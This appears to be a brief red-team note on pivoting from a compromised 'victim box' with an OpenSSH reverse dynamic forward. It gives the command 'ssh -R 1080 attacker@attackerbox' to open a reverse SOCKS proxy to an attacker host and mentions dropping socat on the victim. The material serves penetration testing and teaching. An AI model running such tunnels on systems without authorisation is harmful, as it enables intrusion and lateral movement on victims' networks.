Begin this technique is not good OPSEC
If the victim box is running an SSH client > 7.6 you can create a reverse SOCKS proxy listening on your attacker box.
- ssh(1): add support for reverse dynamic forwarding. In this mode,
ssh will act as a SOCKS4/5 proxy and forward connections
to destinations requested by the remote SOCKS client. This mode
is requested using extended syntax for the -R and RemoteForward
options and, because it is implemented solely at the client,
does not require the server be updated to be supported.
ssh -R 1080 attacker@attackerbox
Which is the exact opposite of using the
-D flag you’re probably familiar with.
End this technique is not good OPSEC
You need to use valid creds for your attacker box on a victim machine for this to work. You could setup a restricted SSH user but you are much better off dropping
socat on their box and binding to a port on their machine. Don’t get hacked trying to be cute homie.